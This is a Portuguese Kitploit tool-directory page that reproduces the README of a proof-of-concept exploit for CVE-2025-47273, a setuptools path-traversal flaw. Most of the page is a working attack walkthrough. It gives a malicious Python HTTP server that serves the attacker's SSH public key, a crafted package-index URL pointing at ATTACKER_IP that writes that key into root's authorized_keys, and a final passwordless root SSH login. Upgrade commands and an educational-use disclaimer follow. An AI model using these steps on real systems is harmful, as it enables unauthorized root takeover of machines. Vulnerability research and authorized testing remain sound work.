Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-47273-POC — CVE-2025-47273 — PoC de path traversal no setuptools | Kitploit
Ferramentas/GitHubGitHub/alielkhatteb/cve-2025-47273-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoSegurança da Cadeia de SuprimentosAprendizado e Educação
GitHubalielkhatteb/cve-2025-47273-poc

CVE-2025-47273-POC

CVE-2025-47273 — PoC de path traversal no setuptools

Ver Repositório
11há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

setuptools Path Traversal CVE-2025-47273

📖 Visão Geral

Exploit de prova de conceito para uma vulnerabilidade de path traversal no Python setuptools < 78.1.1.

Ao abusar da função _download_url do componente PackageIndex, um invasor pode escrever arquivos arbitrários em qualquer local do sistema de arquivos — com os privilégios do processo que executa o setuptools.


🎯 Resumo da Vulnerabilidade

CampoDetalhe
🎯 AlvoPython setuptools < 78.1.1
🐛 Classe de ErroPath Traversal (CWE-22)
💥 ImpactoEscrita arbitrária de arquivos
📍 Vetor de AtaqueURL maliciosa do índice de pacotes
🔍 Causa Raizos.path.join() descarta tmpdir quando o segundo argumento começa com /

📋 Pré-requisitos

  • Python 3 em ambas as máquinas
  • Par de chaves SSH já gerado no atacante (~/.ssh/id_rsa + id_rsa.pub)
  • O script alvo chama o PackageIndex do setuptools com uma URL controlada pelo usuário

🚀 Uso

🔧 Passo 1 — Prepare sua chave pública SSH (Máquina do Atacante)

root@kitploit:~
# Copie sua chave pública para o diretório atual para servi-la
cp ~/.ssh/id_rsa.pub authorized_keys

📡 Passo 2 — Inicie o servidor HTTP malicioso (Máquina do Atacante)

Este servidor responde a qualquer requisição GET com sua chave pública — independentemente do caminho. O setuptools solicitará o caminho /USER/.ssh/authorized_keys mas receberá o conteúdo da sua chave.

root@kitploit:~
cat > python_server.py << 'EOF'
import http.server
import socketserver

class Handler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # Serve authorized_keys regardless of path requested
        self.send_response(200)
        self.end_headers()
        with open("authorized_keys", "rb") as f:
            self.wfile.write(f.read())

with socketserver.TCPServer(("", 80), Handler) as httpd:
    httpd.serve_forever()
EOF

python3 python_server.py

💥 Passo 3 — Acione o path traversal (Máquina da Vítima)

root@kitploit:~
ATTACKER_IP="192.168.1.20"
TARGET_USER="root"

sudo python3 /path/to/vulnerable_script.py \
  "http://${ATTACKER_IP}/%2f${TARGET_USER}%2f.ssh%2fauthorized_keys#egg=evil-1.0"

👾 Passo 4 — Faça login como root (Máquina do Atacante)

root@kitploit:~
ssh root@VICTIM_IP

Sem senha. Shell root direto. 🔑


🔒 Correção

A versão 78.1.1 corrige o problema.

Gerenciador de PacotesComando
🐍 pippip install --upgrade setuptools
🐧 Debian/Ubuntusudo apt upgrade python3-setuptools
🎩 RHEL/Fedorasudo dnf upgrade python3-setuptools
🏗️ Manualsetuptools releases

📎 Referências

  • 🔗 NVD — CVE-2025-47273
  • 🔗 GitHub Advisory — GHSA-5rjg-fvgr-3xxf
  • 🔗 setuptools Fix Commit
  • 🔗 setuptools poc

⚖️ Aviso Legal e Termos

Este código de Prova de Conceito (PoC) é fornecido apenas para fins educacionais e de teste de penetração autorizado.

  • Nenhuma permissão é concedida para modificar, redistribuir ou usar este código para qualquer outro propósito.
  • O uso ou modificação não autorizados podem ser ilegais e antiéticos.
  • Os autores não assumem nenhuma responsabilidade por qualquer uso indevido ou danos.
Baixar ferramenta